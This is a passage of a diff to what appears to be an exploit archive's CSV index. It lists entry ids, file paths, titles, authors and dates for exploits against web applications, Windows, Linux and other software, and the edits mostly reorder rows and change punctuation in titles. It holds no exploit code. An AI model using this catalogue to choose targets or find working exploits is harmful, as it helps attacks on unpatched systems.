22149,platforms/php/webapps/22149.txt,"W-Agora 4.1.6 index.php bn Parameter Traversal Arbitrary File Access",2003-01-13,sonyy,php,webapps,0 22150,platforms/php/webapps/22150.txt,"W-Agora 4.1.6 modules.php file Parameter Traversal Arbitrary File Access",2003-01-13,sonyy,php,webapps,0 -22151,platforms/php/webapps/22151.txt,"Movable Type Pro 5.13en Stored XSS Vulnerability",2012-10-22,sqlhacker,php,webapps,0 -22152,platforms/php/webapps/22152.txt,"Joomla Commedia Plugin (index.php, task parameter) SQL Injection",2012-10-22,D4NB4R,php,webapps,0 -22153,platforms/php/webapps/22153.pl,"Joomla Kunena Component (index.php, search parameter) SQL Injection",2012-10-22,D35m0nd142,php,webapps,0 -22154,platforms/windows/dos/22154.pl,"RealPlayer 15.0.6.14.3gp - Crash PoC",2012-10-22,coolkaveh,windows,dos,0 22155,platforms/windows/dos/22155.pl,"Adobe Reader 10.1.4 Crash PoC",2012-10-22,coolkaveh,windows,dos,0 +22151,platforms/php/webapps/22151.txt,"Movable Type Pro 5.13en Stored XSS Vulnerability",2012-10-22,sqlhacker,php,webapps,0 +22152,platforms/php/webapps/22152.txt,"Joomla Commedia Plugin (index.php task parameter) SQL Injection",2012-10-22,D4NB4R,php,webapps,0 +22153,platforms/php/webapps/22153.pl,"Joomla Kunena Component (index.php search parameter) SQL Injection",2012-10-22,D35m0nd142,php,webapps,0 +22154,platforms/windows/dos/22154.pl,"RealPlayer 15.0.6.14.3gp - Crash PoC",2012-10-22,coolkaveh,windows,dos,0 22156,platforms/php/webapps/22156.txt,"White Label CMS 1.5 - CSRF & Persistent XSS",2012-10-22,pcsjj,php,webapps,0 -22157,platforms/php/webapps/22157.txt,"Schoolhos CMS Beta 2.29 (index.php, id parameter) SQL Injection",2012-10-22,Cumi,php,webapps,0 +22157,platforms/php/webapps/22157.txt,"Schoolhos CMS Beta 2.29 (index.php id parameter) SQL Injection",2012-10-22,Cumi,php,webapps,0 22158,platforms/php/webapps/22158.txt,"wordpress social discussions plugin 6.1.1 - Multiple Vulnerabilities",2012-10-22,waraxe,php,webapps,0 22159,platforms/php/webapps/22159.txt,"subrion CMS 2.2.1 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0 22160,platforms/php/webapps/22160.txt,"atutor 1.2 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0 @@ -19416,6 +19443,7 @@ id,file,description,date,author,platform,type,port 22185,platforms/windows/remote/22185.txt,"Sambar Server 5.x results.stm Cross-Site Scripting Vulnerability",2003-01-20,galiarept,windows,remote,0 22186,platforms/php/webapps/22186.txt,"MyRoom 3.5 GOLD save_item.php Arbitrary File Upload Vulnerability",2003-01-20,frog,php,webapps,0 22187,platforms/linux/remote/22187.txt,"CVS 1.11.x - Directory Request Double Free Heap Corruption Vulnerability",2003-01-20,"Stefan Esser",linux,remote,0 +22279,platforms/php/shellcode/22279.txt,"GONiCUS System Administrator 1.0 - Remote File Include Vulnerability",2003-02-24,"Karol Wiesek",php,shellcode,0 22189,platforms/linux/local/22189.txt,"MTink 0.9.x Printer Status Monitor Environment Variable Buffer Overflow Vulnerability",2003-01-21,"Karol Wiesek",linux,local,0 22190,platforms/linux/local/22190.txt,"ESCPUtil 1.15.2 2 - Local Printer Name Buffer Overflow Vulnerability",2003-01-21,"Karol Wiesek",linux,local,0 22191,platforms/linux/dos/22191.pl,"Apache Web Server 2.0.x - MS-DOS Device Name Denial of Service Vulnerability",2003-01-22,"Matthew Murphy",linux,dos,0 @@ -19427,12 +19455,12 @@ id,file,description,date,author,platform,type,port 22197,platforms/linux/dos/22197.txt,"slocate 2.5/2.6 - Local Buffer Overrun Vulnerability",2003-01-24,"USG team",linux,dos,0 22198,platforms/cgi/webapps/22198.txt,"GNU Mailman 2.1 - 'email' Cross-Site Scripting Vulnerability",2003-01-24,webmaster@procheckup.com,cgi,webapps,0 22199,platforms/cgi/webapps/22199.txt,"GNU Mailman 2.1 Error Page Cross-Site Scripting Vulnerability",2003-01-24,webmaster@procheckup.com,cgi,webapps,0 -22200,platforms/multiple/remote/22200.txt,"SyGate 5.0 Insecure UDP Source Port Firewall Bypass Weak Default Configuration Vulnerability",2003-01-24,"David Fernández",multiple,remote,0 +22200,platforms/multiple/remote/22200.txt,"SyGate 5.0 Insecure UDP Source Port Firewall Bypass Weak Default Configuration Vulnerability",2003-01-24,"David Fernández",multiple,remote,0 22201,platforms/multiple/remote/22201.txt,"List Site Pro 2.0 User Database Delimiter Injection Vulnerability",2003-01-24,Statix,multiple,remote,0 22202,platforms/php/webapps/22202.txt,"FTLS GuestBook 1.1 Script Injection Vulnerability",2003-01-25,BrainRawt,php,webapps,0 22203,platforms/solaris/local/22203.txt,"Sun Solaris 2.5/2.6/7.0/8/9 AT Command Arbitrary File Deletion Vulnerability",2003-01-27,"Wojciech Purczynski",solaris,local,0 22204,platforms/cgi/webapps/22204.txt,"MultiHTML 1.5 File Disclosure Vulnerability",2000-09-13,"Niels Heinen",cgi,webapps,0 -22205,platforms/linux/remote/22205.txt,"Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability",2003-01-26,"Jouko Pynnönen",linux,remote,0 +22205,platforms/linux/remote/22205.txt,"Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability",2003-01-26,"Jouko Pynnönen",linux,remote,0 22206,platforms/php/webapps/22206.txt,"Nukebrowser 2.x - Remote File Include Vulnerability",2003-01-30,Havenard,php,webapps,0 22207,platforms/multiple/dos/22207.txt,"3ware Disk Managment 1.10 Malformed HTTP Request DoS Vulnerability",2003-01-30,"Nathan Neulinger",multiple,dos,0 22208,platforms/php/webapps/22208.txt,"myphpPageTool 0.4.3-1 - Remote File Include Vulnerability",2003-02-03,frog,php,webapps,0 @@ -19443,7 +19471,6 @@ id,file,description,date,author,platform,type,port 22213,platforms/windows/remote/22213.txt,"Opera 7.0 JavaScript Console Attribute Injection Vulnerability",2003-02-04,"GreyMagic Software",windows,remote,0 22214,platforms/windows/dos/22214.pl,"Apple QuickTime Player 7.7.2 Crash PoC",2012-10-24,coolkaveh,windows,dos,0 22215,platforms/windows/dos/22215.txt,"Microsoft Office Word 2010 Crash PoC",2012-10-24,coolkaveh,windows,dos,0 -22216,platforms/php/webapps/22216.txt,"bitweaver 2.8.1 - Multiple Vulnerabilities",2012-10-24,"Trustwave's SpiderLabs",php,webapps,0 22217,platforms/windows/remote/22217.txt,"Opera 7 Image Rendering HTML Injection Vulnerability",2003-02-04,"GreyMagic Software",windows,remote,0 22218,platforms/windows/remote/22218.txt,"Opera 7.0 History Object Information Disclosure Weakness",2003-02-04,"GreyMagic Software",windows,remote,0 22219,platforms/windows/remote/22219.txt,"Opera 7.0 Error Message History Disclosure Weakness",2003-02-04,"GreyMagic Software",windows,remote,0 @@ -19477,7 +19504,7 @@ id,file,description,date,author,platform,type,port 22248,platforms/hp-ux/local/22248.sh,"HP-UX 10.x rs.F3000 Unspecified Unauthorized Access Vulnerability",2003-02-12,"Last Stage of Delirium",hp-ux,local,0 22249,platforms/aix/dos/22249.txt,"IBM AIX 4.3.3/5.1/5.2 libIM Buffer Overflow Vulnerability",2003-02-12,"Euan Briggs",aix,dos,0 22250,platforms/multiple/dos/22250.sh,"iParty Conferencing Server Denial of Service Vulnerability",1999-05-08,wh00t,multiple,dos,0 -22251,platforms/multiple/remote/22251.sh,"AIX 3.x/4.x,Windows 95/98/2000/NT 4,SunOS 5 gethostbyname() Buffer Overflow",2006-09-28,RoMaNSoFt,multiple,remote,0 +22251,platforms/multiple/remote/22251.sh,"AIX 3.x/4.x & Windows 95/98/2000/NT 4 & SunOS 5 gethostbyname() - Buffer Overflow",2006-09-28,RoMaNSoFt,multiple,remote,0 22252,platforms/php/webapps/22252.txt,"PHP-Board 1.0 User Password Disclosure Vulnerability",2003-02-15,frog,php,webapps,0 22253,platforms/php/webapps/22253.txt,"DotBr 0.1 System.PHP3 - Remote Command Execution Vulnerability",2003-02-15,frog,php,webapps,0 22254,platforms/php/webapps/22254.txt,"DotBr 0.1 Exec.PHP3 - Remote Command Execution Vulnerability",2003-02-15,frog,php,webapps,0 @@ -19501,11 +19528,10 @@ id,file,description,date,author,platform,type,port 22272,platforms/multiple/local/22272.pl,"Perl2Exe 1.0 9/5.0 2/6.0 Code Obfuscation Weakness",2002-02-22,"Simon Cozens",multiple,local,0 22273,platforms/linux/dos/22273.c,"Zlib 1.1.4 Compression Library gzprintf() Buffer Overrun Vulnerability (1)",2003-02-23,"Richard Kettlewel",linux,dos,0 22274,platforms/linux/remote/22274.c,"Zlib 1.1.4 Compression Library gzprintf() Buffer Overrun Vulnerability (2)",2003-02-23,CrZ,linux,remote,0 -22275,platforms/linux/remote/22275.pl,"Webmin 0.9x,Usermin 0.9x/1.0 Session ID Spoofing Unauthenticated Access Vulnerability",2003-02-20,"Carl Livitt",linux,remote,0 +22275,platforms/linux/remote/22275.pl,"Webmin 0.9x_Usermin 0.9x/1.0 Session ID Spoofing Unauthenticated Access Vulnerability",2003-02-20,"Carl Livitt",linux,remote,0 22276,platforms/php/webapps/22276.txt,"Nuked-Klan 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2003-02-23,"gregory Le Bras",php,webapps,0 22277,platforms/php/webapps/22277.txt,"Nuked-Klan 1.3 - Remote Information Disclosure Vulnerability",2003-02-23,"gregory Le Bras",php,webapps,0 22278,platforms/linux/remote/22278.pl,"moxftp 2.2 Banner Parsing Buffer Overflow Vulnerability",2003-02-24,"Knud Erik Hojgaard",linux,remote,0 -22279,platforms/php/shellcode/22279.txt,"GONiCUS System Administrator 1.0 - Remote File Include Vulnerability",2003-02-24,"Karol Wiesek",php,shellcode,0 22280,platforms/windows/remote/22280.txt,"Microsoft Outlook2000/Express 6.0 - Arbitrary Program Execution Vulnerability",2003-02-24,http-equiv,windows,remote,0 22281,platforms/php/webapps/22281.php,"Mambo Site Server 4.0.12 RC2 Cookie Validation Vulnerability",2003-02-24,"Simen Bergo",php,webapps,0 22282,platforms/php/webapps/22282.txt,"WihPhoto 0.86 -dev sendphoto.php File Disclosure Vulnerability",2003-02-24,frog,php,webapps,0 @@ -19532,7 +19558,12 @@ id,file,description,date,author,platform,type,port 22304,platforms/multiple/remote/22304.rb,"ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection",2012-10-28,metasploit,multiple,remote,0 22305,platforms/windows/remote/22305.rb,"HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow",2012-10-29,metasploit,windows,remote,0 22306,platforms/windows/remote/22306.rb,"HP Operations Agent - Opcode coda.exe 0x34 Buffer Overflow",2012-10-29,metasploit,windows,remote,0 +22330,platforms/windows/dos/22330.txt,"Microsoft Office Excel 2010 - Crash PoC",2012-10-29,coolkaveh,windows,dos,0 +22332,platforms/unix/local/22332.c,"BSD lpr 2000.05.07/0.48/0.72_lpr-ppd 0.72 - Local Buffer Overflow Vulnerability (2)",1998-04-22,CMN,unix,local,0 +22333,platforms/windows/dos/22333.pl,"Qualcomm Eudora 5.0/5.1/6.0 Long Attachment Filename Denial of Service Vulnerability (1)",2003-03-05,"Paul Szabo",windows,dos,0 +22334,platforms/windows/dos/22334.pl,"Qualcomm Eudora 5.0/5.1/6.0 Long Attachment Filename Denial of Service Vulnerability (2)",2003-03-05,"Paul Szabo",windows,dos,0 22310,platforms/windows/dos/22310.txt,"Microsoft Office Publisher 2010 Crash PoC",2012-10-28,coolkaveh,windows,dos,0 +22331,platforms/unix/local/22331.c,"BSD lpr 2000.05.07/0.48/0.72_lpr-ppd 0.72 - Local Buffer Overflow Vulnerability (1)",1998-04-22,"Niall Smart",unix,local,0 22311,platforms/cgi/remote/22311.txt,"Axis Communications Video Server 2.x Command.CGI File Creation Vulnerability",2003-02-28,"Martin Eiszner",cgi,remote,0 22312,platforms/cgi/remote/22312.txt,"Apple QuickTime/Darwin Streaming Server 4.1.x parse_xml.cgi File Disclosure Vulnerability",2003-02-28,"Joe Testa",cgi,remote,0 22313,platforms/unix/remote/22313.c,"Sendmail 8.12.x Header Processing Buffer Overflow Vulnerability (1)",2003-03-02,"Last Stage of Delirium",unix,remote,0 @@ -19552,11 +19583,6 @@ id,file,description,date,author,platform,type,port 22327,platforms/multiple/remote/22327.txt,"3Com SuperStack 3 Firewall Content Filter Bypassing Vulnerability",2003-03-05,bit_logic,multiple,remote,0 22328,platforms/windows/dos/22328.txt,"Dr.Web 4.x Virus Scanner Folder Name Buffer Overflow Vulnerability",2003-03-05,"Fernandez Madrid",windows,dos,0 22329,platforms/windows/local/22329.c,"CoffeeCup Software Password Wizard 4.0 HTML Source Password Retrieval Vulnerability",2003-03-03,THR,windows,local,0 -22330,platforms/windows/dos/22330.txt,"Microsoft Office Excel 2010 - Crash PoC",2012-10-29,coolkaveh,windows,dos,0 -22331,platforms/unix/local/22331.c,"BSD lpr 2000.05.07/0.48/0.72,lpr-ppd 0.72 - Local Buffer Overflow Vulnerability (1)",1998-04-22,"Niall Smart",unix,local,0 -22332,platforms/unix/local/22332.c,"BSD lpr 2000.05.07/0.48/0.72,lpr-ppd 0.72 - Local Buffer Overflow Vulnerability (2)",1998-04-22,CMN,unix,local,0 -22333,platforms/windows/dos/22333.pl,"Qualcomm Eudora 5.0/5.1/6.0 Long Attachment Filename Denial of Service Vulnerability (1)",2003-03-05,"Paul Szabo",windows,dos,0 -22334,platforms/windows/dos/22334.pl,"Qualcomm Eudora 5.0/5.1/6.0 Long Attachment Filename Denial of Service Vulnerability (2)",2003-03-05,"Paul Szabo",windows,dos,0 22335,platforms/unix/local/22335.pl,"Tower Toppler 0.99.1 Display Variable Local Buffer Overflow Vulnerability",2002-03-02,"Knud Erik Hojgaard",unix,local,0 22336,platforms/php/webapps/22336.txt,"PHPPing 0.1 - Remote Command Execution Vulnerability",2003-03-06,"gregory Le Bras",php,webapps,0 22337,platforms/cgi/webapps/22337.txt,"Wordit Logbook 098b3 Logbook.pl Remote Command Execution Vulnerability",2003-03-07,"Aleksey Sintsov",cgi,webapps,0 @@ -19580,9 +19606,9 @@ id,file,description,date,author,platform,type,port 22355,platforms/cgi/remote/22355.txt,"Thunderstone TEXIS 3.0 - 'texis.exe' Information Disclosure Vulnerability",2003-03-14,sir.mordred@hushmail.com,cgi,remote,0 22356,platforms/unix/remote/22356.c,"Samba SMB 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow Vulnerability",2003-03-15,flatline,unix,remote,0 22357,platforms/asp/webapps/22357.txt,"RSA ClearTrust 4.6/4.7 Login Page Cross-Site Scripting Vulnerability",2003-03-15,sir.mordred@hushmail.com,asp,webapps,0 -22358,platforms/multiple/dos/22358.cfm,"Sun JDK/SDK 1.3/1.4,IBM JDK 1.3.1,BEA Systems WebLogic 5/6/7 java.util.zip Null Value Denial of Service (1)",2003-03-15,"Marc Schoenefeld",multiple,dos,0 -22359,platforms/multiple/dos/22359.xsl,"Sun JDK/SDK 1.3/1.4,IBM JDK 1.3.1,BEA Systems WebLogic 5/6/7 java.util.zip Null Value Denial of Service (2)",2003-03-15,"Marc Schoenefeld",multiple,dos,0 -22360,platforms/multiple/dos/22360.java,"Sun JDK/SDK 1.3/1.4,IBM JDK 1.3.1,BEA Systems WebLogic 5/6/7 java.util.zip Null Value Denial of Service (3)",2003-03-15,"Marc Schoenefeld",multiple,dos,0 +22358,platforms/multiple/dos/22358.cfm,"Sun JDK/SDK 1.3/1.4_IBM JDK 1.3.1_BEA Systems WebLogic 5/6/7 java.util.zip Null Value Denial of Service (1)",2003-03-15,"Marc Schoenefeld",multiple,dos,0 +22359,platforms/multiple/dos/22359.xsl,"Sun JDK/SDK 1.3/1.4_IBM JDK 1.3.1_BEA Systems WebLogic 5/6/7 java.util.zip Null Value Denial of Service (2)",2003-03-15,"Marc Schoenefeld",multiple,dos,0 +22360,platforms/multiple/dos/22360.java,"Sun JDK/SDK 1.3/1.4_IBM JDK 1.3.1_BEA Systems WebLogic 5/6/7 java.util.zip Null Value Denial of Service (3)",2003-03-15,"Marc Schoenefeld",multiple,dos,0 22361,platforms/linux/remote/22361.cpp,"Qpopper 3/4 Username Information Disclosure Weakness",2003-03-11,plasmahh,linux,remote,0 22362,platforms/linux/local/22362.c,"Linux Kernel 2.2.x/2.4.x Privileged Process Hijacking Vulnerability (1)",2003-03-17,anszom@v-lo.krakow.pl,linux,local,0 22363,platforms/linux/local/22363.c,"Linux Kernel 2.2.x/2.4.x Privileged Process Hijacking Vulnerability (2)",2003-04-10,"Wojciech Purczynski",linux,local,0 @@ -19624,7 +19650,7 @@ id,file,description,date,author,platform,type,port 22399,platforms/php/webapps/22399.txt,"Endpoint Protector 4.0.4.2 - Multiple Persistent XSS",2012-11-01,"CYBSEC Labs",php,webapps,0 22401,platforms/windows/dos/22401.php,"Internet Explorer 9 Memory Corruption Crash PoC",2012-11-01,"Jean Pascal Pereira",windows,dos,0 22402,platforms/windows/dos/22402.txt,"RealPlayer 15.0.6.14(.3g2) - WriteAV Crash PoC",2012-11-01,coolkaveh,windows,dos,0 -22403,platforms/php/webapps/22403.txt,"Joomla Spider Catalog (index.php, product_id parameter) SQL Injection Vulnerability",2012-11-01,D4NB4R,php,webapps,0 +22403,platforms/php/webapps/22403.txt,"Joomla Spider Catalog (index.php product_id parameter) SQL Injection Vulnerability",2012-11-01,D4NB4R,php,webapps,0 22405,platforms/php/webapps/22405.txt,"MyBB Follower User Plugin - SQL Injection",2012-11-01,Zixem,php,webapps,0 22406,platforms/linux/dos/22406.txt,"Konqueror 4.7.3 Memory Corruption",2012-11-01,"Tim Brown",linux,dos,0 22407,platforms/hardware/dos/22407.txt,"Netgear 1.x ProSafe VPN Firewall Web Interface Login Denial of Service Vulnerability",2003-03-21,"Paul Kurczaba",hardware,dos,0 @@ -19648,6 +19674,7 @@ id,file,description,date,author,platform,type,port 22425,platforms/php/dos/22425.php,"PHP 4.x socket_recv() Signed Integer Memory Corruption Vulnerability",2003-03-26,"Sir Mordred",php,dos,0 22426,platforms/php/dos/22426.php,"PHP 4.x socket_recvfrom() Signed Integer Memory Corruption Vulnerability",2003-03-26,"Sir Mordred",php,dos,0 22427,platforms/php/webapps/22427.txt,"Wordpress All Video Gallery 1.1 - SQL Injection Vulnerability",2012-11-02,"Ashiyane Digital Security Team",php,webapps,0 +22521,platforms/php/webapps/22521.c,"XMB Forum 1.8 Member.PHP SQL Injection Vulnerability",2003-04-22,zeez@bbugs.org,php,webapps,0 22429,platforms/php/webapps/22429.txt,"vBulletin ChangUonDyU Advanced Statistics - SQL Injection Vulnerability",2012-11-02,Juno_okyo,php,webapps,0 22430,platforms/php/webapps/22430.txt,"PrestaShop <= 1.5.1 Persistent XSS",2012-11-02,"David Sopas",php,webapps,0 22431,platforms/php/webapps/22431.txt,"achievo 1.4.5 - Multiple Vulnerabilities",2012-11-02,"Canberk BOLAT",php,webapps,0 @@ -19660,7 +19687,7 @@ id,file,description,date,author,platform,type,port 22438,platforms/php/webapps/22438.txt,"PostNuke 0.72x Stats Module Path Disclosure Vulnerability",2003-03-28,rkc,php,webapps,0 22439,platforms/php/webapps/22439.txt,"PostNuke 0.72x Members_List Module Path Disclosure",2003-03-28,rkc,php,webapps,0 22440,platforms/hardware/dos/22440.c,"D-Link DI-614+ IP Fragment Reassembly Denial of Service Vulnerability",1998-04-16,humble,hardware,dos,0 -22441,platforms/multiple/dos/22441.txt,"Mozilla 1.x,Opera 7.0 LiveConnect JavaScript Denial of Service Vulnerability",2003-03-28,"Marc Schoenefeld",multiple,dos,0 +22441,platforms/multiple/dos/22441.txt,"Mozilla 1.x_Opera 7.0 LiveConnect JavaScript Denial of Service Vulnerability",2003-03-28,"Marc Schoenefeld",multiple,dos,0 22442,platforms/unix/remote/22442.c,"sendmail 8.11.6 Address Prescan Memory Corruption Vulnerability",2003-03-29,sorbo,unix,remote,0 22443,platforms/php/webapps/22443.txt,"Beanwebb Guestbook 1.0 Unauthorized Administrative Access Vulnerability",2003-03-29,euronymous,php,webapps,0 22444,platforms/php/webapps/22444.txt,"Justice Guestbook 1.3 Path Disclosure Vulnerability",2003-03-29,euronymous,php,webapps,0 @@ -19709,8 +19736,9 @@ id,file,description,date,author,platform,type,port 22487,platforms/asp/webapps/22487.txt,"Web Wiz Site News 3.6 Information Disclosure Vulnerability",2003-04-14,drG4njubas,asp,webapps,0 22488,platforms/windows/remote/22488.txt,"EZ Publish 2.2.7/3.0 site.ini Information Disclosure Vulnerability",2003-04-15,"gregory Le Bras",windows,remote,0 22489,platforms/windows/shellcode/22489.cpp,"Windows XP Pro SP3 - Full ROP calc shellcode",2012-11-05,b33f,windows,shellcode,0 -22490,platforms/multiple/webapps/22490.txt,"ZPanel <= 10.0.1 - CSRF, XSS, SQLi, Password Reset",2012-11-05,pcsjj,multiple,webapps,0 +22490,platforms/multiple/webapps/22490.txt,"ZPanel <= 10.0.1 - CSRF & XSS & SQLi & Password Reset",2012-11-05,pcsjj,multiple,webapps,0 22491,platforms/php/webapps/22491.txt,"EZ Publish 2.2.7/3.0 - Multiple Cross-Site Scripting Vulnerabilities",2003-04-15,"gregory Le Bras",php,webapps,0 +22501,platforms/php/webapps/22501.txt,"Xonic.ru News 1.0 script.php Remote Command Execution Vulnerability",2003-03-31,"DWC Gr0up",php,webapps,0 22492,platforms/php/webapps/22492.txt,"EZ Publish 2.2.7/3.0 - Multiple Path Disclosure Vulnerabilities",2003-04-15,"gregory Le Bras",php,webapps,0 22493,platforms/hardware/webapps/22493.txt,"CheckPoint/Sofaware Firewall Multiple Vulnerabilities",2012-11-05,Procheckup,hardware,webapps,0 22494,platforms/php/webapps/22494.txt,"OSCommerce 2.2 Product_Info.PHP Denial of Service Vulnerability",2003-04-15,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 @@ -19719,7 +19747,6 @@ id,file,description,date,author,platform,type,port 22498,platforms/php/webapps/22498.txt,"OSCommerce 2.2 - Authentication Bypass Vulnerability",2003-04-15,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22499,platforms/cgi/webapps/22499.pl,"IkonBoard 3.1 Lang Cookie Arbitrary Command Execution Vulnerability (1)",2003-04-15,"Nick Cleaton",cgi,webapps,0 22500,platforms/cgi/webapps/22500.pl,"IkonBoard 3.1 Lang Cookie Arbitrary Command Execution Vulnerability (2)",2003-05-05,snooq,cgi,webapps,0 -22501,platforms/php/webapps/22501.txt,"Xonic.ru News 1.0 script.php Remote Command Execution Vulnerability",2003-03-31,"DWC Gr0up",php,webapps,0 22502,platforms/multiple/dos/22502.pl,"TW-WebServer 1.0 - Denial of Service Vulnerability (1)",2003-04-15,badpack3t,multiple,dos,0 22503,platforms/multiple/dos/22503.c,"TW-WebServer 1.0 - Denial of Service Vulnerability (2)",2003-04-16,"Shashank pandey",multiple,dos,0 22504,platforms/windows/remote/22504.txt,"Cerberus FTP Server 2.1 Information Disclosure Weakness",2003-04-16,"Ziv Kamir",windows,remote,0 @@ -19738,8 +19765,9 @@ id,file,description,date,author,platform,type,port 22518,platforms/windows/dos/22518.html,"Microsoft Shlwapi.dll 6.0.2800.1106 Malformed HTML Form Tag DoS Vulnerability",2003-04-22,"Ramon Pinuaga Cascales",windows,dos,0 22519,platforms/php/webapps/22519.txt,"OpenBB 1.0/1.1 Board.PHP Remote SQL Injection Vulnerability",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 22520,platforms/php/webapps/22520.txt,"OpenBB 1.0/1.1 Member.PHP Remote SQL Injection Vulnerability",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 -22521,platforms/php/webapps/22521.c,"XMB Forum 1.8 Member.PHP SQL Injection Vulnerability",2003-04-22,zeez@bbugs.org,php,webapps,0 22522,platforms/multiple/remote/22522.pl,"Web Protector 2.0 Trivial Encryption Weakness",2003-04-22,rjfix,multiple,remote,0 +22570,platforms/windows/remote/22570.java,"Microsoft Windows Media Player 7.1 Skin File Code Execution Vulnerability",2003-05-07,"Jelmer Kuperus",windows,remote,0 +22571,platforms/cgi/webapps/22571.pl,"HappyMall E-Commerce Software 4.3/4.4 Normal_HTML.CGI Command Execution Vulnerability",2003-05-07,"Revin Aldi",cgi,webapps,0 22524,platforms/php/webapps/22524.txt,"zenphoto 1.4.3.3 - Multiple Vulnerabilities",2012-11-06,waraxe,php,webapps,0 22525,platforms/windows/remote/22525.rb,"EMC Networker Format String",2012-11-07,metasploit,windows,remote,0 22526,platforms/windows/remote/22526.rb,"WinRM VBS Remote Code Execution",2012-11-07,metasploit,windows,remote,0 @@ -19786,8 +19814,6 @@ id,file,description,date,author,platform,type,port 22567,platforms/linux/local/22567.c,"Leksbot 1.2 - Multiple Unspecified Vulnerabilities",2003-05-06,gunzip,linux,local,0 22568,platforms/windows/dos/22568.pl,"Floosietek FTGate PRO 1.22 SMTP MAIL FROM Buffer Overflow Vulnerability",2003-05-06,"Dennis Rand",windows,dos,0 22569,platforms/windows/dos/22569.pl,"Floosietek FTGate PRO 1.22 SMTP RCPT TO Buffer Overflow Vulnerability",2003-05-06,"Dennis Rand",windows,dos,0 -22570,platforms/windows/remote/22570.java,"Microsoft Windows Media Player 7.1 Skin File Code Execution Vulnerability",2003-05-07,"Jelmer Kuperus",windows,remote,0 -22571,platforms/cgi/webapps/22571.pl,"HappyMall E-Commerce Software 4.3/4.4 Normal_HTML.CGI Command Execution Vulnerability",2003-05-07,"Revin Aldi",cgi,webapps,0 22572,platforms/cgi/webapps/22572.pl,"HappyMall E-Commerce Software 4.3/4.4 Member_HTML.CGI Command Execution Vulnerability",2003-05-08,"Revin Aldi",cgi,webapps,0 22573,platforms/freebsd/local/22573.pl,"ListProc 8.2.9 Catmail ULISTPROC_UMASK Buffer Overflow Vulnerability",2003-05-08,kf,freebsd,local,0 22574,platforms/freebsd/local/22574.pl,"Lgames LTris 1.0.1 - Local Memory Corruption Vulnerability",2003-05-09,"Knud Erik Hojgaard",freebsd,local,0 @@ -19815,7 +19841,7 @@ id,file,description,date,author,platform,type,port 22596,platforms/hardware/dos/22596.txt,"Verilink NetEngine 6100-4 Broadband Router - TFTP Packet Remote Denial of Service Vulnerability",2003-05-08,"Lorenzo Cerulli and Fabio Annunziato",hardware,dos,0 22597,platforms/php/webapps/22597.txt,"PHP-Nuke 6.5 - Multiple Downloads Module SQL Injection Vulnerabilities",2003-05-13,"Albert Puigsech Galicia",php,webapps,0 22598,platforms/php/webapps/22598.txt,"PHP-Nuke 6.0/6.5 Web_Links Module Path Disclosure Vulnerability",2003-05-13,"Rynho Zeros Web",php,webapps,0 -22599,platforms/php/webapps/22599.html,"vBulletin 3.0 Private Message HTML Injection Vulnerability",2003-05-14,"Ferruh Mavituna",php,webapps,0 +22599,platforms/php/webapps/22599.html,"vBulletin 3.0 - Private Message HTML Injection Vulnerability",2003-05-14,"Ferruh Mavituna",php,webapps,0 22600,platforms/php/webapps/22600.txt,"Owl Intranet Engine 0.7 - Authentication Bypass Vulnerability",2003-05-14,cdowns,php,webapps,0 22601,platforms/linux/remote/22601.txt,"Inktomi Traffic Server 4.0/5.x - Cross-Site Scripting Vulnerability",2003-05-14,"Hugo Vazquez",linux,remote,0 22602,platforms/palm_os/dos/22602.c,"PalmOS 3/4 ICMP Flood Remote Denial of Service Vulnerability",2003-05-14,"Shaun Colley",palm_os,dos,0 @@ -19834,7 +19860,7 @@ id,file,description,date,author,platform,type,port 22615,platforms/freebsd/local/22615.c,"Maelstrom Server 3.0.x Argument Buffer Overflow Vulnerability (3)",2003-05-20,CMN,freebsd,local,0 22616,platforms/linux/local/22616.pl,"Maelstrom Player 3.0.x Argument Buffer Overflow Vulnerability (1)",2003-05-21,"Luca Ercoli",linux,local,0 22617,platforms/linux/local/22617.c,"Maelstrom Player 3.0.x Argument Buffer Overflow Vulnerability (2)",2003-05-20,knight420,linux,local,0 -22618,platforms/php/webapps/22618.txt,"ttCMS 2.2/2.3,ttForum 1.1 Index.PHP Instant-Messages Preferences SQL Injection Vulnerability",2003-05-20,ScriptSlave@gmx.net,php,webapps,0 +22618,platforms/php/webapps/22618.txt,"ttCMS 2.2/2.3_ttForum 1.1 Index.PHP Instant-Messages Preferences SQL Injection Vulnerability",2003-05-20,ScriptSlave@gmx.net,php,webapps,0 22619,platforms/linux/dos/22619.txt,"CUPS 1.1.x Cupsd Request Method Denial of Service Vulnerability",2003-05-20,"Phil D'Amore",linux,dos,0 22620,platforms/windows/remote/22620.txt,"Working Resources BadBlue 1.7.x/2.x Unauthorized HTS Access Vulnerability",2003-05-20,mattmurphy,windows,remote,0 22621,platforms/windows/dos/22621.txt,"Microsoft Netmeeting 2.1/3.0.1 4.4.3385 CALLTO URL Buffer Overflow Vulnerability",2003-05-20,"David F. Madrid",windows,dos,0 @@ -19908,9 +19934,9 @@ id,file,description,date,author,platform,type,port 22690,platforms/windows/dos/22690.c,"Activity Monitor 2002 2.6 - Remote Denial of Service Vulnerability",2003-05-29,"Luca Ercoli",windows,dos,0 22691,platforms/windows/remote/22691.txt,"pablo software solutions baby ftp server 1.2 - Directory Traversal Vulnerability",2003-05-29,dr_insane,windows,remote,0 22692,platforms/cgi/webapps/22692.txt,"Zeus Web Server 4.x Admin Interface VS_Diag.CGI Cross-Site Scripting Vulnerability",2003-05-29,"Hugo Vazquez",cgi,webapps,0 -22693,platforms/php/webapps/22693.txt,"cPanel 5/6,Formail-Clone E-Mail Restriction Bypass Vulnerability",2003-05-30,"Chad C. Keep",php,webapps,0 +22693,platforms/php/webapps/22693.txt,"cPanel 5/6_Formail-Clone E-Mail Restriction Bypass Vulnerability",2003-05-30,"Chad C. Keep",php,webapps,0 22694,platforms/windows/dos/22694.c,"Desktop Orbiter 2.0 1 Resource Exhaustion Denial of Service Vulnerability",2003-05-30,"Luca 